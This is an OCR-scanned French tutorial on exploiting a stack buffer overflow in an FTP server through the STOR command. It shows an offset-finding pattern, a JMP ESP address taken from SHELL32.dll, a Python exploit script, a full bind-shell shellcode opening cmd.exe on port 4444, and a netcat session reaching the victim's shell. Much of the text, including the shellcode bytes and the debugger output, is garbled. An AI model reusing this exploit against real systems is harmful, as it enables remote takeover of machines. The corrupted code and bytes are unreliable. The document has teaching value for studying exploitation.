print " ou la chaîne de caractère débute dans le buffer. 
Cette recherche est sensible à la casse!" 

sys.exit() 
try: 

dummy = int (sys.argv[1]) 
except: 

usage () 


if len(sys.argv) > 3: 
usage 

if len(sys.argv) == 
search = "TRUE" 
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searchstr = sys.argv{2] 
else: 
search = "FALSE" 


stop = int(sys.argv{1]) / 3 +1 
patend = int(sys.argv{l]) 
patrange = range(0,stop,l) 


first = 65 
second = 97 
third = 0 
item = "" 


En lançant le programme nous obtenons : 
BT ~ # genbuf.pl 2000 


Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9IAbOAb1Ab2Ab3AbDA4ADSADEAD7ADBAbDIACOAcCIAC2AC 
3Ac4Ac5Ac6Ac7Ac8Ac9Ad0AdlAd2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0AelAe2Ae3Ae4Ae5Ae6A 
e7Ae8Ae9Af0Af1Af2Af3Af4Af5SAfGAf7AfSAfIAgOAg1Ag2Ag3Ag4Ag5Ag6Ag7/7Ag8AgIAh0Ah 
1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9AiQAilAi2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3AJ4AJ5Aj6 
Aj7AjJ8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9A10A11A12A13A14A15A16A17A18A1l19Am0A 
mlAm2Am3Am4Am5Am6Am7Am8Am9An0AnlAn2An3An4An5An6An7An8An9Ao0o0A01A02 
A03A04A05A06A07A08A09Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1lAq2Aq3Aq4Aq5 
Aq6Aq7/Aq8Aq9Ar0ArlAr2Ar3Ar4ArSAr6Ar7Ar8Ar9As0As1As2As3As4As5As6AsS7As8AsIAtO 
AtlAt2At3At4At5SAtGAT7AtB8AtIAUOAUIAU2AUZAUAAUSAUGAUTAUBSAUIAVOAVIAV2AVIAVAAV 
5Av6AvV7Av8AvV9Aw0AwlAw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1lAx2Ax3Ax4Ax5Ax6Ax7A 
x8Ax9Ay0AylAy2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9ľ9Ba0BalBa 
2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0OBb1Bb2Bb3Bb4Bb5SBb6Bb7Bb8Bb9IBcOBc1Bc2Bc3Bc4BcSBc6é 
Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0BelBe2Be3Be4Be5Be6Be7Be8Be9Bf0B£f 
1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9B90Bg9lBg2B3B94Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh 
6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8B)j9Bk0Bkl 
Bk2Bk3Bk4Bk5SBk6Bk7Bk8Bk9B10B11B12B13B14B15B16B17B18B19Bm0BmlBm2Bm3Bm4Bm5BméB 
m7Bm8Bm9Bn0BniBn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0BolBo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp 
0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0BqlBa2Bq3Ba4Bq5Bq6Ba7Bq8Bq9Br0Br1Br2Br3Br4 
Br5Bré6Br7/Br8Br9Bs0OBs1Bs2Bs3Bs4Bs5SBs6Bs7Bs8Bs9BtOBt1Bt2Bt3Bt4BtSBt6Bt7Bt8Bt 
9Bu0BulBu2Bu3Bu4Bu5SBu6Bu7Bu8Bu9Bv0OBviBv2Bv3Bv4Bv5Bvé6Bv7Bv8Bv9IBwOBw1Bw2Bw3Bw 
ABW5BWw6Bw7/7BwW8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7 
By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0CalCa2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0OCb1Cb 
2Cb3Cb4Cb5Cb6Cb7Cb8CHICCOCCICc2Cc3CcACc5ECcéCc7Cc8CcICd0CdlCd2Cd3Cd4CdSCdE 
Cd7Cd8Cd9CelCelCe2Ce3CedCesCe6Ce7Ce8CeNCEOCFICÉF2CF3CFACESCEGCEICE8CF9Cg0CglC 
g2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4CiSCi6C 
i7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6C)j7Cj8C3j 9ICkKOCkKICkK2Ck3CKACKSCKECK7CKBCKICIOCIL 
C12C13C14C15C16C17C18C19Cm0OCmlCm2Cm3Cm4Cm5Cm6Cm7Cm8CmICn0CniCn2Cn3Cn4Cn5Cn 
6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co 
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Si on injecte maintenant cela grâce à notre fuzzer (on remplace les À par 
les 2000 caractères ci-dessus) nous retrouvons dans eip \x42\6/\x32\x42 
qui est en ascii B2gB. Il faut donc trouver ces quatre octets et compter le 
nombre de caractères avant (avec un petit script python ou wc en bash...). 


EIP est donc écrasé du 966ème caractère au 9/0ème. 
Nous pouvons maintenant tester notre théorie : 


| #!/usr/bin/python 
| import socket 

s = socket.socket(socket.AF INET, socket.SOCK STREAM) 
buffer = uMNXATE CE OEGE ARAA E AE EU AA ET 1030 
s.connect(('10.0.0.2',21)) 

data = s.recv(1024) 

s.send('USER ftp' +'\r\n') 

data = s.recv(1024) 

s.send('PASS ftp' +'\r\n') 

data = s.recv(1024) 

s.send('STOR ' +buffer+t'\r\n') 

s.close() 


Nous obtenons ceci sous ollydbg : 


[Ej Fie vew Debog Trace Options winds Heip 


aw n sja Hi #4 ginian E] 


RE s S 


TOANE ALLES WEAATION -SARau iep to past exo lo ta popes 


Nous savons maintenant exactement comment contrôler EIP. 
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Regardons si nous avons assez de place pour placer un shellcode. 


AAAAAAAAAAAAANAA 


EEEE p t h 
PEA 


EX Un O0 OA OI OI OY AD pet prete put ponte Pont pats pe 


AAAAAAAAAAARAARE 


HAAAAHRRERARAAAN 


DI Où Où OO On 0 RO CO Di C5 Or UO ON (la PS pes A A pn po À pes E 


EX Qu Où GI Li 14 O5 CR LA O Ur OI Ut Cla met pot pos EX pen pes pen pur pe 
BEREBESR EEE EEE. 


ED LOLO Ur OA UA GXL LO PO ma me pu pos Dos je os ptl 


RLSTAURES 
Où ü5 Us 


3 Où Où Où Les Le OJ OJ Q Où Où Où O5 "i 


D G ONON U I pt poah pah es es pe e 


+ 
Q. 


Dn 


Eu 


Log Or O Cat Lie Or Oa QU LUS La La CE On OA a H pt po pus Pa pes et pou 


SU Lg LO Q3 UO Un Où 03 Us 


LES Oi Ol Oi Uy i 


3 À) Où Où Un O5 65 O5 


AE T EU 
SRE 13 20 TO ON 
i Ol GI OEO LO t i 


be 


CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 
C1, Reason:[Acce 
ss Disallowed].C 
CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCC 


Zoo) 


ATEN EE] 


DD 
DADON 


D6BA98 - D6B6D8 = 960 (en décimal), nous avons donc plus de 960 oc- 
tets pour placer notre shellcode ce qui est amplement suffisant. 
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Nous allons maintenant remplacer ce qu'il y a dans EIP, c'est-à-dire 
\x42\x42\x42\x42 par une adresse valide, il nous restera ensuite à placer 
notre shellcode. 


Nous devrions placer dans EIP l'adresse pointant sur ESP, cela marcherait en 
local mais pas dans notre cas, il va falloir trouver un moyen pour pointer sur 
un JMP ESP. 


Pour trouver cette adresse valide, nous allons encore utiliser ollydbg et 
rechercher dans une dil chargée par le programme un JMP ESP. 


L'habitude est d'utiliser USER32.dil ou SHELL32.dil 


C:\Documents and ei edle 
C:SWINOOWS\system32conct l32.dll 
NUINDOWS“system32NMFC42LOC,. DLL 
SUIHDOWS\system32\WS2HELP. dll 
SUINDOUS system82 uS2 32. di! 
SUINOOUSsystemS2NFC42. DLL 
NWIMDOUSWinSkS #86. Microsoft.Windows 
NUINDOUSXsystemS2Nnasvert. dll 
NUIHDOWSNsyster132\USER32, dll 


GG400080 | 0436000! 00041952A to 
SeBSGaGo| 00097400! SSES32BA | cemct 132 
61870000! GQG0EQGA HFC42LOC 
719E0000| 000SSOOO| 719E 1642; US2HELP 
719F 0000! 00017000| 719F1273;1IS2_32 
73B29000! GQGFEQGQ) 72B2723C8 | t1FC42 
77390000! 00102000| 77394283] cenct 132 
77BE000Q| 00OSSOOA| 7 7BEF2A1 | msvcrt 
77B10000| G0G90088 | UseïC l ief USERS2 


. 2600. 2180 
:1.2606. 2188 
02.4131. 


DANDAANNNANDPNNDN 
D == à 
09000000000000 


. t 
77BAQOOO! GOOACOOO 770A70B4| ADUAPI32 .2600.2180 ( NWINDOWSSNEyst era32XADUAPI32. dll 
77ESAQO0| OAA91AUA| 77E5E284 „2600.2180 ( NUINDOWSNsystemS2NRPCRT4. dll 
T7EFQAQA A0A4EAAA; 7 FEFÉSCA! GOI32 -1,22600,2180 (À C: \WIHBOUS sus tenS2 GDI82. dl l 
17F 40006! 00007600A! 77F 45103! SHLWAPI 9.2900.2188 :NUIMDOUS“eyster132\SHLUWAPI. dll 
2C800000! 00104000 7C80B436 | kerne 132 !1.2600.2180 (1 C: WINB@US systenS2kerne 182. dll 
7C910000/ 000B7O0Q: 7C923156/ntd1ll .1. 2600.2180 (į C:\WINDOWSSsysten32Nntdll.dil 
7C9B0000| 00822000| 7C9EFA10! SHELL32 „00. 2900.2180 |C: WINDOWUS\systerm32\SHELLS2, dit 
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En double cliquant sur SHELL32 vous obtenez le code assembleur de cette 
dil. On peut maintenant rechercher une commande dans ce code : 


21 @F84 A0B30500 | JE FCRANDSE 
Ej 48 DEC EAX 

48 DEC_EAX 
+ @FS84 23010000 | JE 7C9EFB19 
FF75 19 PUSH DWORD PTR SS:[EBP+191 
FF75 ØC PUSH DWORD PTR $$:[EBP+0C] 
FF75 08 USH DWORD PTR S9: [EBP+8] 
re psogooaa ?CSEFAB9 


Backup 
‘ Edit 
MOU EBX, ! 
re 
YESI, ssemble... pace 


7E 

2ÈSEFAIF| 5 Add comment... Semicolon (;) 
PO REFRZ D 18 HOU_EDI,DI 

7È y JE 7CA4EGÍ Breakpoint 


it trace 


f 


re “A Jacgaczc à Neworiginhere  Ctri+Gray * 
F Follow in Durnp 
Go to 


Show names Ctri+N 


Comman 
E Find references to Constant, , 
HEC 


a54i 3 ; Er ; 
db LE : 2 3 + Highlight register Bar sing. 


Addressing 
All commands. ,, 

Comments 
eii All constants... 


ånalysis All intermedular calls 


All referenced strings 


All “SES constants 
ARE ii 


Ps 
FT 


OOOO y 


Search: (© Entire block 
@ Forward 
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T% EL A aie 
FFSB 4F048B55 | DEC DWORD PTR DS: [EBX+558B044F] 


Privileged instruction 
MQU ECX, DWORD PTR DS:[EDX#4+ECX] 
PUSH DWORD PTR DS: [ECX] 
HOU Ean DWORD PTR DS:[E$IJ 


ORD P 
CHF | EAX, I DWORD PTR DSi [EDI] 


Nous trouvons donc une adresse (/CA68265) pour un JMP ESP, cette 
adresse peut être différente sur votre machine. 


Nous pouvons donc remplacer : 


[| buffer =: RATE 47066: + NELI E A + NAS 1080 


par : 
f buffer = '\x41' * 966 + '\x65\x82\xA6\x7C' + '\x90' * 16 + '\xCC' *1014 


Nous pouvons placer notre shellcode : 


shellcode =("\xfc\xé6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\xéc\x24\x24\ 
x8b\x45" 
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49" 
"M\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0O\x74\x07\xci\xca\x0Od" 
"M\x0O1\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xeS\x8b\xSf\x24\x01\xeb\x66" 
"\x8b\x0c\x4b\x8b\x5f\xlc\x01\xeb\x03\x2c\x8b\x89\x6c\x24\xlc\x61" 
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\xic\xad\x8b\x40" 
M\x08\x5e\x68\x8e\xde\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" 
M\X68\x77\x73\x32\Xx5f\x54\xff\xd0\x68\xch\xed\xfc\x3b\x50\xff\xd6" 
M\XSÉ\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xa9\x09" 
M\x£S\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0" 
M\x66\x68\x11\x5c\x66\x53\x89\xel\x95\x68\xa4d\xla\x70\xc7\x57\xff" 
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xad4\xad\x2e\xe9\x57\xff\xd6\x53" 
M\XS5\xff\xd0\x68\xes\x49\x86\x49\x57\xff\xd6\x50\x54\x54\xS5S\xff" 
"M\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\xéd" 
M\X66\x68\x63\x6d4\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" 
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab" 
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51" 
"\x51\x51\x6a\x01\Xx51\x51\Xx55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" 
M\XÉF\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xda6" 
M\X52\Xxff\xd0\x68\xf0\x8a\x0O4\x5Sf\x53\xff\xd6\xff\xa0") 


Ce shellcode peut être trouvé sur Internet. Il ouvre, grâce à netcat, le port 
4444 et redirige cmd.exe vers ce port. 
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Nous pouvons maintenant modifier notre ligne buffer : 


buffer = '\x41' * 966 + '\x65\x82\xA6\x7C' + !'\x90' * 16 + 
shellcode 


Nous pouvons lancer le shellcode puis nous connecter sur le port 4444 de la 
victime. 


FaSm ~ # nc -v 10.0.0.2 4444 

10.0.0.3: inverse host lookup failed: Unknown host 
(UNKNOWN) [10.0.0.2] 4444 (krb524) open 

Microsoft Windows XP [Version 5.00.2195] 

(C) Copyright 1985-2000 Microsoft Corp. 
C:\abilitywebserver> 


Nous avons accès à Windows, l'exploit est donc réussi. 


L'exemple que nous venons de voir est connu sur le net mais il nous donne 
un cas concret pour bien comprendre les bases des buffers overflow. 
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